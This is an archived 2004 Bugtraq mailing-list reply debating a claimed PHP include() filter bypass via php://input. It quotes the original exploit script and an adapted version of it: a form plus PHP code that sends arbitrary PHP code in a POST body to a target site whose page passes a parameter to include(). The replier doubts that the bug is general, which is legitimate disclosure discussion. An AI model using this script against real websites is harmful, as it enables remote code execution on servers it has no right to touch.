Re: [PHP] include() bypassing filter with php://input

• Previous message: Cesar: "Re: WildTangent Web Driver Long FileName Stack Overflow"
• In reply to: Keary Suska: "Re: [PHP] include() bypassing filter with php://input"
• Next in thread: Ali Campbell: "Re: [PHP] include() bypassing filter with php://input"
• Reply: Ali Campbell: "Re: [PHP] include() bypassing filter with php://input"
• Reply: bugtraq subscriber: "Re: [PHP] include() bypassing filter with php://input"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: bugtraq@securityfocus.com
Date: Fri, 28 May 2004 21:27:11 +0200

Hi there!

i use php 4.3.5 and tried this "proof of concept". i assumed, that the
form attribute "methode" is a typing mistake and adapted the exploit to
get it working under a php 4.3.x default configuration (it's kinda
paradox to use autoglobals in an exploit that aims to secure other
products).

but even this adapted version (see below) does not show anything on
execution.

this exploit seems to rely on a exploitable web service, that gets paths
to include files from a get variable named "page".

so this seems to me like a (fixed/changed) bug at the single service
"www.exemple.com" (not to be mixed up with www.example.com from rfc
2606) and not a general php issue.

############ snippet start ############
<form method="post" >
target server : <input type="text" name="server"/><br/>
file : <input type="text" name="file" /><br/>
exec : <input type="text" name="cmd" /><br/>
<input type="submit" value="send" />
</form>
<?php
if(is_array($_POST) && isset($_POST['cmd']) && isset($_POST['server'])
&& isset($_POST['file'])){
    $message = "POST /".$_POST['file']."php://input HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: deflate\r\n";
    $message .= "Host: ".$_POST['server']."\r\n";
    $message .= "Content-length: ".strlen($_POST['cmd'])."\r\n";
    $message .= "\r\n";
    $message .= urlencode($_POST['cmd'])."\r\n";
    $fd = fsockopen($_POST['server'],80);
    fputs($fd,$message);
    while(!feof($fd)) {
        echo fgets($fd,1280);
    }
    fclose($fd);
}
?>
############ snippet end ############

On Fri, 2004-05-28 at 06:51, Keary Suska wrote:
> What exactly does your "proof of concept" do? I tried this on my system with
> PHP 4.34.x--which, by the way, is when support for php://input began, *not*
> 3.0.13--and nothing happened whatsoever. Where's the proof?
>
> on 5/27/04 3:07 AM, lostnoobs@security-challenge.com purportedly said:
>
> >
> >
> > Informations :
> > °°°°°°°°°°°°°°
> > Website : http://www.php.net
> > Version : PHP 3.0.13 =>
> > Problem : Inlude() bypassing filter
> >
> >
> > Proof of concept:
> > °°°°°°°° Exploit °°°°°°°°°
> > <------------ cut here ---------------->
> > <form action="" methode="post" >
> > target server : <input type="text" name="server" ><br>
> > file : <input type="text" name="file" ><br>
> > exec : <input type="text" name="cmd" ><br>
> > <INPUT type="submit" value="send">
> > </form>
> >
> > <?
> > if($cmd){
> > $message = "POST /".$file."php://input HTTP/1.1\r\n";
> > $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> > application/x-shockwave-flash, */*\r\n";
> > $message .= "Accept-Language: fr\r\n";
> > $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
> > $message .= "Accept-Encoding: deflate\r\n";
> > $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
> > MyIE2)\r\n";
> > $message .= "Host: ".$server."\r\n";
> > $message .= "Content-length: ".strlen( $cmd )."\r\n";
> > $message .= "Connection: Keep-Alive\r\n";
> > $message .= "Cache-Control: no-cache\r\n";
> > $message .= "\r\n";
> > $message .= $cmd."\r\n";
> > $fd = fsockopen( $server, 80 );
> > fputs($fd,$message);
> > while(!feof($fd)) {
> > echo fgets($fd,1280);
> > }
> > fclose($fd);
> > }
> > ?>
> > <------------ cut here ---------------->
> >
> > target server = "www.exemple.com"
> > file = "index.php?page="
> > exec = "<? phpinfo(); ?>"
> >
> > Explaination
> > °°°°°°°°°°°°°°
> > You can bypassing filter protection who parse http:// or ftp:// ...
> > "php://input" allows to put data in the function include() by sending a
> > request with code php in POST methode.
> >
> >
> > For More details :
> > °°°°°°°°°°°°°°
> > http://fr2.php.net/manual/en/wrappers.php.php
> > irc.fr.worldnet.net #s-c
> >
> > Nourredine Himeur
> >
> > www.security-challenge.com
> >
> > This vulnerability was found by Slythers but he's too shy for publish the vuln
> > ;)
> >
> > greetz : mum , daddy , tcpteam , Nyx
> >
> >
> >
>
>
> Keary Suska
> Esoteritech, Inc.
> "Leveraging Open Source for a better Internet"
>

• Previous message: Cesar: "Re: WildTangent Web Driver Long FileName Stack Overflow"
• In reply to: Keary Suska: "Re: [PHP] include() bypassing filter with php://input"
• Next in thread: Ali Campbell: "Re: [PHP] include() bypassing filter with php://input"
• Reply: Ali Campbell: "Re: [PHP] include() bypassing filter with php://input"
• Reply: bugtraq subscriber: "Re: [PHP] include() bypassing filter with php://input"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]